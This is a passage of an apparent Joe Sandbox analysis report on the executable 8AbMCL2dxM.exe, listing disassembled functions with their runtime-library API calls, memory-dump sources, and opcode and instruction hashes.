                                      • Opcode ID: f2df130ed16357207f7c97ee9f8fdf62b892ec6658758b5bbc8db2dc931dae17
                                      • Instruction ID: 8f03ab1541992c327676a922b7a86cd7ffcf4b69252f14a3f2a3db7e55070bbc
                                      • Opcode Fuzzy Hash: f2df130ed16357207f7c97ee9f8fdf62b892ec6658758b5bbc8db2dc931dae17
                                      • Instruction Fuzzy Hash: 905184B6E04109EFDF14DFA8C881AADB7F9EF88310F25816DE858E7341D6359E018B50
                                      Function 008F80F0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 160COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008F8254
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: byte digest to $ bytes$HashTransformation: can't truncate a
                                      • API String ID: 2005118841-1139078987
                                      • Opcode ID: 3ab670a428f689d73132d5955854bd66b1277beaa995bd037edc519571015849
                                      • Instruction ID: 8240a50a6ae42132facc0092266360d67c72846398a30f6d1fb3f8fa83e331d3
                                      • Opcode Fuzzy Hash: 3ab670a428f689d73132d5955854bd66b1277beaa995bd037edc519571015849
                                      • Instruction Fuzzy Hash: D7518D71E04218EFDB11DFA8CC45FDEBBB8FB59714F0041AAE908E7381DA705A048BA1
                                      Function 00970072 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\8AbMCL2dxM.exe,00000104), ref: 009700B2
                                      • _free.LIBCMT ref: 0097017D
                                      • _free.LIBCMT ref: 00970187
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Users\user\Desktop\8AbMCL2dxM.exe
                                      • API String ID: 2506810119-3959656167
                                      • Opcode ID: f727fc398c5f4e622d285736ab80037d8d4b0e7b5e0d230be241b94482d8f0fb
                                      • Instruction ID: 499aca89f80e98d86825eb6c288c35688fb2a4afcb1759941665700e99042009
                                      • Opcode Fuzzy Hash: f727fc398c5f4e622d285736ab80037d8d4b0e7b5e0d230be241b94482d8f0fb
                                      • Instruction Fuzzy Hash: 85317072A49218EFDB21EF99DD85A9EBBFCEBC5710F508067F80897211D6708E41DB60
                                      Function 00984BC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3_catch.LIBCMT ref: 00984BCF
                                      • make_shared.LIBCPMT ref: 00984C1A
                                        • Part of subcall function 009848AF: __EH_prolog3.LIBCMT ref: 009848B6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: H_prolog3H_prolog3_catchmake_shared
                                      • String ID: MOC$RCC
                                      • API String ID: 1798871530-2084237596
                                      • Opcode ID: 4c5c2420946bbbeb477a1cf8dca4bf4139c10d7cc5479f35cb85011fbf5859f6
                                      • Instruction ID: 3e0bfef0d9c49179b65406f811ba9c25dda7c1043cd3fe5e7002bea6630cf6ef
                                      • Opcode Fuzzy Hash: 4c5c2420946bbbeb477a1cf8dca4bf4139c10d7cc5479f35cb85011fbf5859f6
                                      • Instruction Fuzzy Hash: DDF06D74A12219CFCB16FF58C553A9D3B6CEF81782B458090F8406B321CB789E85CBA6
                                      Function 00950262 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 00950284
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00950297
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 009502A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                      • String ID: pContext
                                      • API String ID: 1990795212-2046700901
                                      • Opcode ID: b582de5e4e9c3401dad825273fb1ef11555c1111ae6c63389d21fe60bc6fe4d5
                                      • Instruction ID: f030fd20e254a249dec6207c28f947745d65ee5d0dff33397211c3321bf086dc
                                      • Opcode Fuzzy Hash: b582de5e4e9c3401dad825273fb1ef11555c1111ae6c63389d21fe60bc6fe4d5
                                      • Instruction Fuzzy Hash: DAE09236B0021467CB04FBA9E84AE9EB7AD9FC4724B444065A911A3245EF74AE05C7D0
                                      Function 00946943 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00946973
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00946981
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                      • String ID: pScheduler$version
                                      • API String ID: 1687795959-3154422776
                                      • Opcode ID: 366ebfa20a644627defe5b7dd5b351ca74b5ff7918db4ad110c0e578f1e239cb
                                      • Instruction ID: 0235117a89dcb0eb60e84b2020c24514b5be5f0fddf5b34b50652a0d33819a77
                                      • Opcode Fuzzy Hash: 366ebfa20a644627defe5b7dd5b351ca74b5ff7918db4ad110c0e578f1e239cb
                                      • Instruction Fuzzy Hash: 74E08C70900208B6CF14FAA9D84BFDC37A85BA534DF008425BA01210D99BF8A699CB82
                                      Function 0095AB0A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,Dflt,00959A43,?,009C9AE8,?,?,?,?,?,?,?), ref: 0095AB18
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0095AB26
                                      • SetLastError.KERNEL32(00000000,?,?,?,?,?), ref: 0095AB2F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLast$Value___vcrt_
                                      • String ID: Dflt
                                      • API String ID: 483936075-3880269418
                                      • Opcode ID: 421be3be6a7088ed49d3933e5077f06a37c04c32583487c60d72a3a541365bfb
                                      • Instruction ID: 56b90e72b9a1918188c26504336b09c7a6b512777fdaaf94f1d4909172411a89
                                      • Opcode Fuzzy Hash: 421be3be6a7088ed49d3933e5077f06a37c04c32583487c60d72a3a541365bfb
                                      • Instruction Fuzzy Hash: FCD01236628212578A105F7AFC199A67BABE7C13337184732F120C3094D778944AA6A0
                                      Function 009765D7 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: __alldvrm$_strrchr
                                      • String ID:
                                      • API String ID: 1036877536-0
                                      • Opcode ID: a3d52ccceee4d5b79723829a6409bfa81b0500304f01b07d1e3e07d20a0b1bb6
                                      • Instruction ID: 81283f3a03381712b6b13994abb53c4234dde39cd8db04f2b0ee83678e6ccff4
                                      • Opcode Fuzzy Hash: a3d52ccceee4d5b79723829a6409bfa81b0500304f01b07d1e3e07d20a0b1bb6
                                      • Instruction Fuzzy Hash: D6A17873900B869FEB26CF28C891BAEBBE5FF51354F18856DE4888B242C7389D41C751
                                      Function 0092CEB5 Relevance: 6.3, APIs: 4, Instructions: 289COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _strcspn$H_prolog3_ctype
                                      • String ID:
                                      • API String ID: 838279627-0
                                      • Opcode ID: 6632ad230f410fcf079228f2070d0198ea47a9dd295bada47b4430f83a8309aa
                                      • Instruction ID: 57bf25d39c82b6c8ce00bcdb1a37bcefe24fbd49c6fab456be63e3de322990b8
                                      • Opcode Fuzzy Hash: 6632ad230f410fcf079228f2070d0198ea47a9dd295bada47b4430f83a8309aa
                                      • Instruction Fuzzy Hash: 43B167B1D012599FDF14DFA8D984AEEBBB9FF48310F144019E805AB219D730AE46CFA1
                                      Function 0092D1CC Relevance: 6.3, APIs: 4, Instructions: 289COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _strcspn$H_prolog3_ctype
                                      • String ID:
                                      • API String ID: 838279627-0
                                      • Opcode ID: a24061a6b967396983c595ac9e9ba4856edb8b514c14cbf54edc91e34f1aa18a
                                      • Instruction ID: 3f3e84927096fe308481598a46e258fc9d6c2d6d7560090d01a2b7c0f6cacf03
                                      • Opcode Fuzzy Hash: a24061a6b967396983c595ac9e9ba4856edb8b514c14cbf54edc91e34f1aa18a
                                      • Instruction Fuzzy Hash: 52B179B1D01259DFDF14DFA8D884AEEBBB9FF48310F144419E805AB256D730AE45CBA2
                                      Function 009261E8 Relevance: 6.3, APIs: 4, Instructions: 281COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _strcspn$H_prolog3_ctype
                                      • String ID:
                                      • API String ID: 838279627-0
                                      • Opcode ID: 4a07e28138eb325ae07309914434d8f034a700ccc92aba4ec1e6540c55207615
                                      • Instruction ID: 68bd1558ce696892444ec5fcee3169ffbdec18e4a056138ad146644a039ae0ec
                                      • Opcode Fuzzy Hash: 4a07e28138eb325ae07309914434d8f034a700ccc92aba4ec1e6540c55207615
                                      • Instruction Fuzzy Hash: 41B1A971900269DFDF14DFE8D981AEEBBB9FF48310F140419E805AB25AD770AE41CBA1
                                      Function 0095AB8F Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: AdjustPointer
                                      • String ID:
                                      • API String ID: 1740715915-0
                                      • Opcode ID: cd58933f58399ff8c4397a13256232d1ea5b7390220974bc32a5b3ec76d9dbb5
                                      • Instruction ID: 496d7f53eb391e68602a68e8f514a6d10e67b3e51c2d8d4397c69f5c0dc3a4a2
                                      • Opcode Fuzzy Hash: cd58933f58399ff8c4397a13256232d1ea5b7390220974bc32a5b3ec76d9dbb5
                                      • Instruction Fuzzy Hash: C9511671601206EFDB24CF12C881BBA77A9FF44312F14461DEC8657280E735EC89D79A
                                      Function 009594F6 Relevance: 6.1, APIs: 4, Instructions: 141COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: EqualOffsetTypeids
                                      • String ID:
                                      • API String ID: 1707706676-0
                                      • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                      • Instruction ID: 941e7413ed0bbd671c1334129516d871900f2cb80cb227c36201c4ffb5bbe51e
                                      • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                      • Instruction Fuzzy Hash: BC518935905209DFEF11CF6AC480AAEBBF8EF55325F14449AEC51AB251D732AE0DCB90
                                      Function 00946173 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00946186
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                      • String ID:
                                      • API String ID: 3433162309-0
                                      • Opcode ID: d507e9a08b0754d982fe63bc8bf353748c72d1b0726db1b8248580158e7195bd
                                      • Instruction ID: f1d3adb6fc92f2ea4cdcaf518a628aed3bc68c0ed35dc27bde0435d0f02b7324
                                      • Opcode Fuzzy Hash: d507e9a08b0754d982fe63bc8bf353748c72d1b0726db1b8248580158e7195bd
                                      • Instruction Fuzzy Hash: B13159B5A00309EFCF14DF94C4C0FAE7BB9AF86311F1404AAE915AB246D770A944CBA1
                                      Function 00940850 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 009404B0: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,BA3649C5,BA3649C5,?,?,?,00000000,00000000,BA3649C5,BA3649C5), ref: 009404F5
                                      • ReleaseSemaphore.KERNEL32(?,?,00000000,BA3649C5,?,BA3649C5,BA3649C5,?,0098C9F0,000000FF,?,00940589), ref: 009408A0
                                      • ReleaseSemaphore.KERNEL32(?,?,00000000,?,00940589), ref: 009408C1
                                      • CloseHandle.KERNEL32(?,?,BA3649C5,BA3649C5), ref: 009408F2
                                      • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00990C30,000000FF), ref: 0094092C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ReleaseSemaphore$CloseEventHandleObjectSingleWait
                                      • String ID:
                                      • API String ID: 568734227-0
                                      • Opcode ID: e0c4e776bb47abf7eec3c2844cef40293e4f987737c6571d1b0a24069599e6b2
                                      • Instruction ID: af81c13912451e6c1344a375c446093f7dab61cfe8aa850e4444b9c921827e2e
                                      • Opcode Fuzzy Hash: e0c4e776bb47abf7eec3c2844cef40293e4f987737c6571d1b0a24069599e6b2
                                      • Instruction Fuzzy Hash: B1318B71A40204AFEB14CF68D885F16B7A8EB84314F1485A9EE19DB396D736EC10CBA0
                                      Function 0095335B Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                      Download Yara Rule
                                      APIs
                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 009533AB
                                        • Part of subcall function 0094D317: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0094D338
                                      • Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 009533C4
                                      • Concurrency::location::_Assign.LIBCMT ref: 009533DA
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0095341B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Context$Base::Concurrency::details::$EventThrow$AssignBlockedConcurrency::location::_Exception@8InternalSpinTraceUntil
                                      • String ID:
                                      • API String ID: 1204113144-0
                                      • Opcode ID: ff4a82bea540d0f54097c314290a8705a4f08eb82d5b0a1969f0670c8a4e6eaf
                                      • Instruction ID: 2a90e6d659f158b7a4f68031a391b7c1e3b453a195c344dff675a800be0c4407
                                      • Opcode Fuzzy Hash: ff4a82bea540d0f54097c314290a8705a4f08eb82d5b0a1969f0670c8a4e6eaf
                                      • Instruction Fuzzy Hash: E7213570B002049FCB05EF68C8C6E6DB7B9EF88361B508559E802E7281DF34EE068B91
                                      Function 009704F3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 102ce588106370472f9cada700d6498e13c6fb63175593f64d050a566191fc77
                                      • Instruction ID: 5a79ea2dd53e62dc002f2ecceb8e7c13abfeb30bff1239eca7af20f40267d842
                                      • Opcode Fuzzy Hash: 102ce588106370472f9cada700d6498e13c6fb63175593f64d050a566191fc77
                                      • Instruction Fuzzy Hash: 930121B3609606FEF6205A796CC0F2B671ECFC2BB8B318726F22D611C1DA608E004970
                                      Function 00973592 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00973539,?,00000000,00000000,00000000,?,00973865,00000006,FlsSetValue), ref: 009735C4
